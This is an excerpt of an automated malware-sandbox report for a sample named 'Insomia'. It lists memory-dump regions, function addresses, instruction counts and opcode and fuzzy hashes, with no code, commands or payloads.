Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072264cac05b172c6884ded329ff58fd1908750072b1a2af4ff9089c0319f424
Instruction ID: b5f2db9d98a976066b6c637085c36465f2fd2cd4f5eff8ed27dbdf9b96104ada
Opcode Fuzzy Hash: 072264cac05b172c6884ded329ff58fd1908750072b1a2af4ff9089c0319f424
Instruction Fuzzy Hash: 8DE01A34A042198FC715DFB4D89479DBBB2FB89305F10809AD44AA3344DB306D84CF55

Function 05E9ACF4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 175f703ed39b5740e00d695c1c4c3183819ccc9c53472b9181e6eedfb3c84716
Instruction ID: a1428d4955c547aa475f3f8707e6918b066529ed994417fa2d2c127ac22135f2
Opcode Fuzzy Hash: 175f703ed39b5740e00d695c1c4c3183819ccc9c53472b9181e6eedfb3c84716
Instruction Fuzzy Hash: A1E0E574A002198BDB28DB60D9967D97BB2FB48315F6000A9914AA3384CA302D80DF66

Function 05E9AE79 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4adc926cba581fd6332e113cedd90ba6c8620c9ada9d1b5d5f903d4b4e29e343
Instruction ID: f4ffae175ecf6996303a048390209b10c3fb77c227b1c43129b1469a02295ee1
Opcode Fuzzy Hash: 4adc926cba581fd6332e113cedd90ba6c8620c9ada9d1b5d5f903d4b4e29e343
Instruction Fuzzy Hash: F3E01234600215CBD714DF70D89579DBB72EB48304F208498904B63784DF301D81DF61

Function 05EE3908 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0839bb04cb25480d8976b47007cedf0ffded05c56f304dfcf17ab78aaaca1d55
Instruction ID: 0544a724c65af59ed6015c4d2f70afaedcc5d8161eba04264acc5c298e656285
Opcode Fuzzy Hash: 0839bb04cb25480d8976b47007cedf0ffded05c56f304dfcf17ab78aaaca1d55
Instruction Fuzzy Hash: FBE07578E04228CBCB60DFA4D8446DDBBF1FB4D300F2080A9D569A3345DB3459548F55

Function 060C7387 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0006670ac8da903e0cac5914c0962b92fffdf71fb88ce83d5154858d08b02ae8
Instruction ID: 9afc52132bfbb7d6f6a976aa1669360ada0ce295d29cca9e981f7478042ea884
Opcode Fuzzy Hash: 0006670ac8da903e0cac5914c0962b92fffdf71fb88ce83d5154858d08b02ae8
Instruction Fuzzy Hash: 13E09239B01229CBDB20DB58D845B8AB7B1FB84255F0081A5D549A3244E7305E95CF91

Function 016D50F0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec4a6d633b34b6321d2c5a549b924ec185c8cf83be2e86a9204a384be85dc0aa
Instruction ID: 0e336aa6e1617f347c1f57709af2bf2b10882b3449d6fcdaf430bb7427dbd426
Opcode Fuzzy Hash: ec4a6d633b34b6321d2c5a549b924ec185c8cf83be2e86a9204a384be85dc0aa
Instruction Fuzzy Hash: 8ED0125140D7D06FEB2357681C651093F74DA3360130900C794C3D55A3DD094464C3EA

Function 05E91826 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1156ddb006bd3c4b98c0f1c3cceb2d80a19fe136397308693a4cf0328befa89e
Instruction ID: 1010c6e3167bd41d2a3b0f7f9c076c4d653fde44ab76ed179540cd721f435b29
Opcode Fuzzy Hash: 1156ddb006bd3c4b98c0f1c3cceb2d80a19fe136397308693a4cf0328befa89e
Instruction Fuzzy Hash: 36E01234909289CFCB15CFA8D898ADDBFB5FF19304F045195D145A7341DB345804CB58

Function 016D2920 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f0fa9f4db76a3b6ce94900d157ca40869f17e20a25efcd098bd77fbff32175
Instruction ID: 2b5de30f1d656bfae764d579f04bf6bd9e7da717d7bf03fa1e7c29c10aae1566
Opcode Fuzzy Hash: d8f0fa9f4db76a3b6ce94900d157ca40869f17e20a25efcd098bd77fbff32175
Instruction Fuzzy Hash: 05D092A084E7C5AEC303CB748922541BF72AD5311431DC6CE88998B5A3C62BA806D392

Function 016D16E1 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da21671728c2baebfc3701a0e00a2d2c07b18750fb78042ac5c334de64851434
Instruction ID: 5f0a92921591cfdb14783354b45a8db955f899cbcf856d0d8898aac384025534
Opcode Fuzzy Hash: da21671728c2baebfc3701a0e00a2d2c07b18750fb78042ac5c334de64851434
Instruction Fuzzy Hash: ABD092311092858FE70A8F98C955500BB62EE42244759D5CAD4549B2A7CB36A91ACB91

Function 016DC740 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 068f681bc519ec7beab82a3a8b1e797193977a00945ffde4b629d450677e7e62
Instruction ID: 0d32e6b7787f7a7589f84628dd6f48bb81567d00dc91e0047d933f4d4478472f
Opcode Fuzzy Hash: 068f681bc519ec7beab82a3a8b1e797193977a00945ffde4b629d450677e7e62
Instruction Fuzzy Hash: CFC08C200742094AD25037EC6C0A3FD3A689B41617F819204E20D101014FB0C064C6BA

Function 01B4037D Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121198588.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b40000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0106b868c8b55d52d980d076f23f6120d4cbbc05b433c6ebc4269543532ec9cf
Instruction ID: adca14ecc5adf2e55cf8cb75e04115e251c04a9b28ff277105b698e9568f0f60
Opcode Fuzzy Hash: 0106b868c8b55d52d980d076f23f6120d4cbbc05b433c6ebc4269543532ec9cf
Instruction Fuzzy Hash: 5CD012361491808FC3129F69D914BD03F71BF07319F1900D6E4899F733C2226C01DB11

Function 05E993FD Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78104e4f7341be6c9959bb3312a3dfa4e1576c3f43f244a8d44072d3e7d402d7
Instruction ID: b8190d51016e3ed52e32ed9293f1a9c35424ba2a0c1109235592f32a655142dc
Opcode Fuzzy Hash: 78104e4f7341be6c9959bb3312a3dfa4e1576c3f43f244a8d44072d3e7d402d7
Instruction Fuzzy Hash: 2AC00276F5015DDB8B50EFD9E8808DDBBB5FF94361B408036E624A7204D630696ACF50

Function 016D1048 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea0c3123e561f09ecd6e21538a4911be7456f2a9e4723ccd920dbad87992ec77
Instruction ID: 43ea484133d5ddb8c57163f5fb9a82f315777e8363fcf688779571e6050e6c0e
Opcode Fuzzy Hash: ea0c3123e561f09ecd6e21538a4911be7456f2a9e4723ccd920dbad87992ec77
Instruction Fuzzy Hash: 3EB09B501C5308AB49D021825D0585D7F5D96C68567D0501470091B6079DA55C1203D6

Function 016D702D Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9777a429fd653f155bfc1c813d24f1a578e9a1a086d55b9ea1a585260e28f7f
Instruction ID: 0c02f2c69884aaa53a33a9ca3e11f49ce576d28c881dc81095aaa6199bdaffe4
Opcode Fuzzy Hash: d9777a429fd653f155bfc1c813d24f1a578e9a1a086d55b9ea1a585260e28f7f
Instruction Fuzzy Hash: 6FC01236240008DBEB20CF50FA44888773AEBC8214B020221E80803228C7382E2ACB40

Function 016D7FF8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d648f09bfa4d49b674f0fb01015158e1900a7d34dd3710eaf08d277abaf408e0
Instruction ID: c6c387bfada6cc6f67ca5db21df01c6086435ee8c1d25a622d98c276f664b425
Opcode Fuzzy Hash: d648f09bfa4d49b674f0fb01015158e1900a7d34dd3710eaf08d277abaf408e0
Instruction Fuzzy Hash: A0B0922928074CE385C121DB7F09D6976BFD28595A6944186B50B2BA449A9358504252

Function 01B40238 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121198588.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b40000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9360f6c3753071abd6b5a8e86689413885372535260cb3c19a445abdef9116e5
Instruction ID: 740b9759760942d22b17a3cca9430a66c5404184698edbd653c299f37843b55b
Opcode Fuzzy Hash: 9360f6c3753071abd6b5a8e86689413885372535260cb3c19a445abdef9116e5
Instruction Fuzzy Hash: ECC04C39140108EFCB419F55D844C45BBA9FF19770741C051F9494B632C732E960DB50

Function 05E9AC76 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8664f54657f44239bfff96c46acddfd3d908377ccf12502a68d62b57e6afdb53
Instruction ID: 45978d675a021201e636c2f091df628ad5d6916b83d9b3e3fff0b0a0af44735e
Opcode Fuzzy Hash: 8664f54657f44239bfff96c46acddfd3d908377ccf12502a68d62b57e6afdb53
Instruction Fuzzy Hash: 0AC08C303043018BC3089BA0E09926B3A32EB4138AF104028A04703A88CF340880E742

Function 016D0A40 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c886a0dd23cba8fa36b81baa104ac0c8ee32b39603b1c65ba532397301ba3d18
Instruction ID: 1c380a8985c690a7c3faf3e449b4113f8ae777e91d5c87cc00fa26e629db73eb
Opcode Fuzzy Hash: c886a0dd23cba8fa36b81baa104ac0c8ee32b39603b1c65ba532397301ba3d18
Instruction Fuzzy Hash: 35B01230101309E7C6802197AE144AA37DEE3C80377A49009F11E0A604BD555C5043E3

Function 016D4468 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 205dbd424180b04200194918a8768c1d32a0982f1e3b6f1f6f42e67f91801017
Instruction ID: 7529a1af683842367913658dc914ede1185d4237316fa601d621f13b3041a798
Opcode Fuzzy Hash: 205dbd424180b04200194918a8768c1d32a0982f1e3b6f1f6f42e67f91801017
Instruction Fuzzy Hash: 64B0123438430CEF4A8075CAAC44879362FFFC34193E48104F00B0A744EE559C90439B

Function 016D7EF0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34b933b2209e3c123c06223869fa4b2a769dbba5bc669273e94de73110fbcecc
Instruction ID: 28db81965901554fe96bb6f247dcdc1f4917ff994a126a14ec069e470d8b5116
Opcode Fuzzy Hash: 34b933b2209e3c123c06223869fa4b2a769dbba5bc669273e94de73110fbcecc
Instruction Fuzzy Hash: 67B0120155430C53008025D76C3081975BF85C4054AE04149B4090E65459829C81035A

Function 01B401C0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121198588.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b40000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76255853014eca31e2e2e8ac0bdd67ddfc2ffe8a2e0339b119d6101aa035005c
Instruction ID: 93f3e99bca3043d8ba7cde06d9696bd730a1f2d57a4a44413c75f9c8736ea23a
Opcode Fuzzy Hash: 76255853014eca31e2e2e8ac0bdd67ddfc2ffe8a2e0339b119d6101aa035005c
Instruction Fuzzy Hash: 2BC09239140208EFC700DF5AD949C45BFA8EF1976074580A1FA088B732C732E820DA94

Function 05E9EB00 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55a19f1c4a7f8f410b2e2874c3126776830cfc632daf45247d469850ce39bec
Instruction ID: d5925f436c4bde84940e50a307e008cbb883c6486d3f7400f4429320f46af7e7
Opcode Fuzzy Hash: f55a19f1c4a7f8f410b2e2874c3126776830cfc632daf45247d469850ce39bec
Instruction Fuzzy Hash: 2AB092A2C192552ACE20BBB2894916D2E91991233A7051B82A1F2812E6EA24644DDD22

Function 016D0848 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0a738867b4c297ef0458574a5c1363ebde991c3284cd4f8126a88c7c4b2d36f
Instruction ID: 81c16b1d7dfe930021cfaffed872dd49e5fd21399e09664821bdacf8bf8e7556
Opcode Fuzzy Hash: d0a738867b4c297ef0458574a5c1363ebde991c3284cd4f8126a88c7c4b2d36f
Instruction Fuzzy Hash: B6B0123004410ADF4B2027D07C0D72CB77C96105017419100F40F820054F2058214791

Function 016D28E0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5d8757298732d485282cf3fb0e8f69bb60df6dc5659e58cafa29a6de8b81cd1
Instruction ID: 476bb1a004ccf63cf2a85ea917cd6780e2e3c622653b12f437481e1d6a31be51
Opcode Fuzzy Hash: a5d8757298732d485282cf3fb0e8f69bb60df6dc5659e58cafa29a6de8b81cd1
Instruction Fuzzy Hash: 31A0223208820CC30A0022CA3C0E03CB30C8208300380000CB20E830020A22203803E2

Function 016D1590 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb9da02faac8f8b8fa0170f80eff825213dda7b64e910e7fe5438c2287dfdeb3
Instruction ID: e6dcfa9759bf50cb18147a0b2418e0dc14f141d5fe267e96a8c9bdb687a7b675
Opcode Fuzzy Hash: eb9da02faac8f8b8fa0170f80eff825213dda7b64e910e7fe5438c2287dfdeb3
Instruction Fuzzy Hash: 2CB012343010009BD204CF00C490810B721EBC4214314C09C9C0547351CF33EC03CA00

Function 016D1BF6 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

Function 016D3F88 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9399650cd0389af72f17fd319d5b243322f3011275d25321e6837a55a19294e
Instruction ID: af50513ca26d863d6ce4e14981b1417b68b1248360cab567831878933187d93e
Opcode Fuzzy Hash: c9399650cd0389af72f17fd319d5b243322f3011275d25321e6837a55a19294e
Instruction Fuzzy Hash: 94A02230C000008BF23E8F00FE02B20EA08CF00300F08223208002F238C32C0C008EC0

Non-executed Functions

Function 061A1648 Relevance: 2.8, Strings: 2, Instructions: 337COMMON

Download Yara Rule

Strings

,aq, xrefs: 061A173E
(aq, xrefs: 061A19EC

Memory Dump Source

Source File: 00000000.00000002.2131893356.00000000061A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61a0000_Insomia.jbxd

Similarity

API ID:
String ID: (aq$,aq
API String ID: 0-1929014441
Opcode ID: be3488506eea969d1c9ba109de7d90b1c97dc30df141580e3ef871a185fc2964
Instruction ID: 1c33df5ffd6830b85660ce73651e756b91813fd5a5aff382cb05db81922f6418
Opcode Fuzzy Hash: be3488506eea969d1c9ba109de7d90b1c97dc30df141580e3ef871a185fc2964
Instruction Fuzzy Hash: 28D14939A002059FDB54CFA9C585AADBBF2BF88311F69C4A9E445EB365CB34EC41CB50

Function 060B0040 Relevance: 2.6, Strings: 2, Instructions: 124COMMON

Download Yara Rule

Strings

5, xrefs: 060B96E5
g, xrefs: 060B01CC

Memory Dump Source

Source File: 00000000.00000002.2131480600.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_Insomia.jbxd

Similarity

API ID:
String ID: 5$g
API String ID: 0-4292864820
Opcode ID: 8dca06b09a931c0108fd8f01fbfd8cf00cc3d37a15839395b06e9534614bf72b
Instruction ID: b75421f842ac860ab03e67097d32ee6cfeb2c755b009ec062b347bbdee6fa0da
Opcode Fuzzy Hash: 8dca06b09a931c0108fd8f01fbfd8cf00cc3d37a15839395b06e9534614bf72b
Instruction Fuzzy Hash: EE512871D056588BEB6CCF6B9D442CAFAF3AFC9300F18C1FA954CA6254DB700AC58E51

Function 05E9CC01 Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

Te]q, xrefs: 05E9CF81

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 5d1ecfa0239c84429f77af2a6a668b1e0275af975a79b02257ee908fa1d18721
Instruction ID: 29731083942a168fc8bfd60327b5652a06162dfc0ac15551a4e458fec650f0ea
Opcode Fuzzy Hash: 5d1ecfa0239c84429f77af2a6a668b1e0275af975a79b02257ee908fa1d18721
Instruction Fuzzy Hash: BCA1E2B4E45218CFDB28EFA9D884BEDBBF2BB49304F609069D449A7240EB745D85CF40

Function 06320040 Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

A, xrefs: 063200FD

Memory Dump Source

Source File: 00000000.00000002.2132319101.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6320000_Insomia.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: 09b963243cf9a497fb7f20ab3e15816ad8024a48d06f34226d8f4e4737190f9a
Instruction ID: 3405e0957c6b227445cc98cd862a64991fc6268c80d506cba74177eb69b3f441
Opcode Fuzzy Hash: 09b963243cf9a497fb7f20ab3e15816ad8024a48d06f34226d8f4e4737190f9a
Instruction Fuzzy Hash: D7A11974E06229CFEB68CF65C9487DAB7B6AF89300F0080E9D40DA7648DB744B84CF91

Function 05E9C19D Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

Te]q, xrefs: 05E9C19D

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: e6076ac7b98400501c9ce7d3aa3d19bf0993e80d6fbebd321fd52dd73d0de79e
Instruction ID: 8c23f077251a29f7c21e1eb02dd51573e05894ad20862f04544523870d80e376
Opcode Fuzzy Hash: e6076ac7b98400501c9ce7d3aa3d19bf0993e80d6fbebd321fd52dd73d0de79e
Instruction Fuzzy Hash: 8191A170E45218CFEB68EF69D844BEDB7B2BB89304F60A4A9D44DA7255E7349D81CF00

Function 060B001E Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

g, xrefs: 060B01CC

Memory Dump Source

Source File: 00000000.00000002.2131480600.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_Insomia.jbxd

Similarity

API ID:
String ID: g
API String ID: 0-30677878
Opcode ID: 225dbdd71f5793b76f84d5dfbbbc566c080658b0909a526f2378a65204d30ddd
Instruction ID: 4eae7a6648df18ce2f6c548a32e3cbd4d1c3ee7c4db8e58ec105f677fe6a6130
Opcode Fuzzy Hash: 225dbdd71f5793b76f84d5dfbbbc566c080658b0909a526f2378a65204d30ddd
Instruction Fuzzy Hash: D6515F71D056588BEB6CCF6B8D412CAFAF3AFC9300F18C5FA954CA6265DB700A858E51

Function 060C93F8 Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

pqI, xrefs: 060C94DA

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: pqI
API String ID: 0-1078129942
Opcode ID: 6a8182bada61dd8c71077cac1020465635b0768ebebe436bdba2f47acce15cb5
Instruction ID: 60bfa02cce65c908a343fb7e6a1723669df99df3ff84714ca17757231465dcb8
Opcode Fuzzy Hash: 6a8182bada61dd8c71077cac1020465635b0768ebebe436bdba2f47acce15cb5
Instruction Fuzzy Hash: D4417370E9520ADFDB84CFA9C4811BEBFF1AB88351F948569D516E7310E735CA81CB90

Function 060C9408 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

pqI, xrefs: 060C94DA

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID: pqI
API String ID: 0-1078129942
Opcode ID: 8f63c9f095f1e9590ca9f7fe49b2d7a31f1e685e30be9e79ca019c030c8d668e
Instruction ID: 3ead08f562c3fffcd97e23296bba9979936cb9c9e88dbffdac9838ad615238be
Opcode Fuzzy Hash: 8f63c9f095f1e9590ca9f7fe49b2d7a31f1e685e30be9e79ca019c030c8d668e
Instruction Fuzzy Hash: 21417270E9520ADFDB84CFA9C4816BEBFF1BB88351F948569D516E7310E734CA818B90

Function 06320006 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

A, xrefs: 063200FD

Memory Dump Source

Source File: 00000000.00000002.2132319101.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6320000_Insomia.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: b63385e77d31cbe477f3512b59a50eca720875e7ab804f1bb7c0e8d0d42e5c8f
Instruction ID: 96817fa3c1ab66d94b5a907130388c2fc395cff7f79ab478ec6efff26969371a
Opcode Fuzzy Hash: b63385e77d31cbe477f3512b59a50eca720875e7ab804f1bb7c0e8d0d42e5c8f
Instruction Fuzzy Hash: A1312171D093658FEB59CF2A8C54396BFF7AF86200F09C0EAD44CA6256D7740A89CF51

Function 05E91078 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

(f!, xrefs: 05E91875

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID: (f!
API String ID: 0-886947645
Opcode ID: e0b4dec3998cd18685cd5e31541be2149e41f7157e04cc9cbe9cd31454195897
Instruction ID: bb7a2b4f15d007d9e6d24188a1b64d57b8c9a3b5e5ac0a39fbc87f3b23c1e2cb
Opcode Fuzzy Hash: e0b4dec3998cd18685cd5e31541be2149e41f7157e04cc9cbe9cd31454195897
